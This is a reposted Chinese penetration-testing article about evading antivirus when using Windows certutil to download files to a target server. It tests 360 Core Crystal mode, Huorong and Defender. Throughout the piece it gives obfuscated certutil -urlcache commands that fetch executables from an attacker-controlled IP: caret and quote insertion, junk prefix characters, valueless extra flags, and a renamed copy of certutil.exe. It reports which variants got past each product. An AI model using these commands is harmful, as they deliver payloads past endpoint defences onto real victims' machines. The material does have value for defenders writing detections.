CTF导航 CTF导航

探究certutil在杀软中的绕过实践

渗透技巧 1年前 (2023) admin
452 0 0

əhead@深蓝实验室重保天佑战队

在某些场景下,当我们需要往目标服务器内下载文件时,如果目标上存在杀软时会有拦截行为,导致不能成功完成下载操作。

certutil.exe是windows系统自带的,作为证书服务的命令行程序。用户可以使用certutil.exe转储和显示证书颁发机构配置信息等等以及验证证书、密钥对和证书链。

certutil下载文件的常见命令为:

certutil -urlcache -split -f http://xxx.com/xx.exe
  • -urlcache参数:显示或删除URL缓存条目。
  • -f参数:覆盖现有文件,后面要跟下载的文件地址。
  • -split参数:保存文件。加的话就下载到当前路径,不加就下载到默认路径。

话不多说,下面就以常见的360核晶模式、火绒、defender作为测试环境进行相关的绕过测试。

一、360核晶模式
物理机开启核晶模式的360防护强度上要比虚拟机上的强,我们就以此状态下的为准来测试。
探究certutil在杀软中的绕过实践
首先以certutil的默认下载语法执行,必定是拦截的

探究certutil在杀软中的绕过实践
利用windows的特性,通过” ;@等等符号组合的方式进行混淆执行,发现也能检测到异常行为并拦截。

;,@certutil&&;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/test.txt

探究certutil在杀软中的绕过实践

;,certutil;, /⸿split;,-ur₏lcache -f http://192.168.xx.xx:7000/test.txt

探究certutil在杀软中的绕过实践
通过复制certutil程序,更换其他路径和文件名发现照样是会拦截的。

certutil官方说明链接

https://learn.microsoft.com/zh-cn/windows-server/administration/windows-commands/certutil

那么反回来看certutil的帮助说明,有如下几个无值命令选项,测试发现加上这几个选项后,会生成以该选项为名的缓存文件。

探究certutil在杀软中的绕过实践 探究certutil在杀软中的绕过实践 探究certutil在杀软中的绕过实践

探究certutil在杀软中的绕过实践
那么便可以构造如下几个执行命令了

;,@certutil  -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer

;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deleteEnrollmentServer

;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deletePolicyServer

;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deleteEccCurve

可以看到全程并没有产生拦截告警,成功下载指定文件并生成对应的缓存文件,如下:
探究certutil在杀软中的绕过实践

探究certutil在杀软中的绕过实践
接着只要把对应的缓存文件还原就行了,程序正常运行。
探究certutil在杀软中的绕过实践

二、火绒模式

探究certutil在杀软中的绕过实践
同样默认下载的语句会拦截:

探究certutil在杀软中的绕过实践
加入无效参数-a发现也拦截

certutil -urlcache -a -split -f  http://192.168.xx.xx:8080/xx.txt

探究certutil在杀软中的绕过实践
尝试对参数做一下变形,其中Windows中有些字符串是不影响命令执行的,比如^和”。

cer^t^u^til -url""""cache -a -sp""""lit -f  http://192.168.xx.xx:8080/xx.txt
探究certutil在杀软中的绕过实践

可见并不是简单匹配命令语句,也会动态检测命令参数这些。
既然这样,复制certutil程序,更换其他路径和文件名试试

copy c:\windows\system32\certutil.exe a.exe
a.exe -urlcache -split -f  http://192.168.xx.xx:7000/gdut.txt

探究certutil在杀软中的绕过实践
发现成功绕过检测,不产生拦截并完成下载操作了。

三、Defender模式

探究certutil在杀软中的绕过实践
尝试利用默认的下载语法,以及往其中加入无效的参数发现也是被defender拦截了

探究certutil在杀软中的绕过实践
那么就尝试利用^和”组合发现可以绕过拦截完成下载操作,具体怎么组合根据实际情况决定即可。

certutil -url""""cache -split -f http://192.168.xx.xx:7070/test.txt
cert^u^t^il -url""""cache -sp""""lit -f http://192.168.xx.xx:7070/test.txt

探究certutil在杀软中的绕过实践
通过复制certutil程序,更换路径和文件名使用默认下载语法是会拦截的,这里跟火绒不一样。

探究certutil在杀软中的绕过实践
这里defender应该是对命令参数进行了检测,统一用^和”进行绕过就好。

b.exe -url""""ca^c^he -spl""""it -f http://192.168.xx.xx:7070/test.txt
探究certutil在杀软中的绕过实践

 

原文始发于先知社区(əhead):探究certutil在杀软中的绕过实践

版权声明:admin 发表于 2023年5月5日 上午9:05。
转载请注明:探究certutil在杀软中的绕过实践 | CTF导航

相关文章

劫持资源管理器实现持久性后门
admin
323
CVE-2021-36397 Moodle REST Web服务接口SQL漏洞分析之二
admin
755
CVE-2024-4040 CrushFTP RCE漏洞分析
admin
56
C2隐匿-云函数&域前置
admin
274
CVE-2023-29343
admin
345
脱钩:我的个人网络安全策略
admin
199

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

帆软报表最新前台SQL漏洞复现
0
Cobalt Strike 有效负载将恶意 JavaScript 注入 PDF
0
SolarWinds Serv-U(CVE-2024-28995)
0
CVE-2024-36401 JDK 11-22 通杀内存马
0
注入 Java 内存有效载荷以进行后期利用
0
VMware vCenter RCE CVE-2024-22274 细节公开 !
0
某软Report高版本中利用的一些细节
0
Apache两个高危漏洞poc预警CVE-2024-40725 & CVE-2024-40898
0
警惕伪装成CrowdStrike修复方法相关的钓鱼活动
0
一种新型利用交换文件系统实现持久性感染技术
0